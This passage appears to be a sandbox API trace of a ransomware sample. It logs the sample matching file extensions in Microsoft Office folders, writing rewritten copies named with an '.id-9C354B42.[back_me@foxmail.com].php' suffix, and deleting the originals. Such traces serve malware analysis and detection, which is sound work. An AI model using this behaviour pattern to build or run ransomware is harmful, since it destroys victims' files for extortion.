(lpString=".1cd") returned 4 [0253.658] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW (lpString=".jpg") returned 4 [0253.658] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW (lpString=".doc") returned 4 [0253.658] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0253.658] lstrlenW (lpString=".docx") returned 5 [0253.658] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0253.658] lstrlenW (lpString=".pdf") returned 4 [0253.658] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString=".xls") returned 4 [0253.658] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString=".xlsx") returned 5 [0253.658] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0253.658] lstrlenW (lpString=".ppt") returned 4 [0253.658] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW (lpString=".zip") returned 4 [0253.658] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString=".rar") returned 4 [0253.658] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0253.658] lstrlenW (lpString=".bz2") returned 4 [0253.658] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0253.658] lstrlenW (lpString=".7z") returned 3 [0253.658] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0253.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.658] lstrlenW (lpString=".dbf") returned 4 [0253.658] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0253.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.659] lstrlenW (lpString=".1cd") returned 4 [0253.659] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0253.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66 [0253.659] lstrlenW (lpString=".jpg") returned 4 [0253.659] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0253.659] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0253.659] lstrlenW (lpString="MAPIR.DLL") returned 9 [0253.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0253.672] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=1124720) returned 1 [0253.672] CloseHandle (hObject=0x394) returned 1 [0253.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll")) returned 0x20 [0253.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0253.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.673] lstrlenW (lpString=".doc") returned 4 [0253.673] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0253.673] lstrlenW (lpString=".docx") returned 5 [0253.673] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0253.673] lstrlenW (lpString=".pdf") returned 4 [0253.673] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0253.673] lstrlenW (lpString=".xls") returned 4 [0253.673] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0253.673] lstrlenW (lpString=".xlsx") returned 5 [0253.673] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0253.673] lstrlenW (lpString=".ppt") returned 4 [0253.674] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString=".zip") returned 4 [0253.674] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString=".rar") returned 4 [0253.674] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString=".bz2") returned 4 [0253.674] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0253.674] lstrlenW (lpString=".7z") returned 3 [0253.674] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString=".dbf") returned 4 [0253.674] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString=".1cd") returned 4 [0253.674] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString=".jpg") returned 4 [0253.674] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.674] lstrlenW (lpString=".doc") returned 4 [0253.674] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString=".docx") returned 5 [0253.674] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0253.674] lstrlenW (lpString=".pdf") returned 4 [0253.674] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString=".xls") returned 4 [0253.674] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0253.674] lstrlenW (lpString=".xlsx") returned 5 [0253.674] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0253.674] lstrlenW (lpString=".ppt") returned 4 [0253.674] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0253.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.675] lstrlenW (lpString=".zip") returned 4 [0253.675] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0253.675] lstrlenW (lpString=".rar") returned 4 [0253.675] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0253.675] lstrlenW (lpString=".bz2") returned 4 [0253.675] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0253.675] lstrlenW (lpString=".7z") returned 3 [0253.675] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.675] lstrlenW (lpString=".dbf") returned 4 [0253.675] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0253.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.675] lstrlenW (lpString=".1cd") returned 4 [0253.675] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0253.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL") returned 57 [0253.675] lstrlenW (lpString=".jpg") returned 4 [0253.675] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0253.675] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".php") returned -1 [0253.675] lstrlenW (lpString="MAPIR.DLL.IDX_DLL") returned 17 [0253.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0253.695] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=108416) returned 1 [0253.695] CloseHandle (hObject=0x370) returned 1 [0253.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll")) returned 0x20 [0253.844] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0253.954] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.954] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0253.954] GetLastError () returned 0x0 [0253.954] ReadFile (in: hFile=0x318, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x1a780, lpOverlapped=0x0) returned 1 [0253.961] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x1a790, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x1a790, lpOverlapped=0x0) returned 1 [0253.963] ReadFile (in: hFile=0x318, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.963] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0253.963] SetEndOfFile (hFile=0x37c) returned 1 [0253.963] CloseHandle (hObject=0x37c) returned 1 [0253.963] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.963] SetEndOfFile (hFile=0x318) returned 1 [0253.967] CloseHandle (hObject=0x318) returned 1 [0253.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.967] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapir.dll.idx_dll")) returned 1 [0253.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.968] lstrlenW (lpString=".doc") returned 4 [0253.968] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".docx") returned 5 [0253.968] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0253.968] lstrlenW (lpString=".pdf") returned 4 [0253.968] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".xls") returned 4 [0253.968] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".xlsx") returned 5 [0253.968] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0253.968] lstrlenW (lpString=".ppt") returned 4 [0253.968] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.968] lstrlenW (lpString=".zip") returned 4 [0253.968] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".rar") returned 4 [0253.968] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".bz2") returned 4 [0253.968] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0253.968] lstrlenW (lpString=".7z") returned 3 [0253.968] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString=".dbf") returned 4 [0253.969] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString=".1cd") returned 4 [0253.969] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString=".jpg") returned 4 [0253.969] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString=".doc") returned 4 [0253.969] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".docx") returned 5 [0253.969] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0253.969] lstrlenW (lpString=".pdf") returned 4 [0253.969] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".xls") returned 4 [0253.969] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".xlsx") returned 5 [0253.969] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0253.969] lstrlenW (lpString=".ppt") returned 4 [0253.969] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.969] lstrlenW (lpString=".zip") returned 4 [0253.969] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".rar") returned 4 [0253.969] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".bz2") returned 4 [0253.969] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0253.969] lstrlenW (lpString=".7z") returned 3 [0253.969] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.970] lstrlenW (lpString=".dbf") returned 4 [0253.970] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0253.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.970] lstrlenW (lpString=".1cd") returned 4 [0253.970] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0253.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPIR.DLL.IDX_DLL") returned 65 [0253.970] lstrlenW (lpString=".jpg") returned 4 [0253.970] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0253.970] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0253.970] lstrlenW (lpString="MOR6INT.DLL") returned 11 [0253.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0253.970] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=446312) returned 1 [0253.970] CloseHandle (hObject=0x318) returned 1 [0253.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll")) returned 0x20 [0253.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.971] lstrlenW (lpString=".doc") returned 4 [0253.971] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString=".docx") returned 5 [0253.971] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0253.971] lstrlenW (lpString=".pdf") returned 4 [0253.971] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString=".xls") returned 4 [0253.971] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString=".xlsx") returned 5 [0253.971] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0253.971] lstrlenW (lpString=".ppt") returned 4 [0253.971] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.971] lstrlenW (lpString=".zip") returned 4 [0253.971] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString=".rar") returned 4 [0253.971] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0253.971] lstrlenW (lpString=".bz2") returned 4 [0253.971] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0253.971] lstrlenW (lpString=".7z") returned 3 [0253.971] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.971] lstrlenW (lpString=".dbf") returned 4 [0253.971] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.971] lstrlenW (lpString=".1cd") returned 4 [0253.971] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0253.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".jpg") returned 4 [0253.972] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".doc") returned 4 [0253.972] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString=".docx") returned 5 [0253.972] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0253.972] lstrlenW (lpString=".pdf") returned 4 [0253.972] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString=".xls") returned 4 [0253.972] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString=".xlsx") returned 5 [0253.972] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0253.972] lstrlenW (lpString=".ppt") returned 4 [0253.972] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".zip") returned 4 [0253.972] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString=".rar") returned 4 [0253.972] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0253.972] lstrlenW (lpString=".bz2") returned 4 [0253.972] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0253.972] lstrlenW (lpString=".7z") returned 3 [0253.972] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".dbf") returned 4 [0253.972] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".1cd") returned 4 [0253.972] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0253.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59 [0253.972] lstrlenW (lpString=".jpg") returned 4 [0253.973] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0253.973] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".php") returned -1 [0253.973] lstrlenW (lpString="MOR6INT.REST.IDX_DLL") returned 20 [0253.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0253.973] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=39808) returned 1 [0253.973] CloseHandle (hObject=0x318) returned 1 [0253.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll")) returned 0x20 [0253.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0253.973] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.973] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0253.974] GetLastError () returned 0x0 [0253.974] ReadFile (in: hFile=0x318, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x9b80, lpOverlapped=0x0) returned 1 [0253.976] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x9b90, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x9b90, lpOverlapped=0x0) returned 1 [0253.977] ReadFile (in: hFile=0x318, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.977] WriteFile (in: hFile=0x37c, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0253.977] SetEndOfFile (hFile=0x37c) returned 1 [0253.978] CloseHandle (hObject=0x37c) returned 1 [0253.978] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.978] SetEndOfFile (hFile=0x318) returned 1 [0253.982] CloseHandle (hObject=0x318) returned 1 [0253.982] 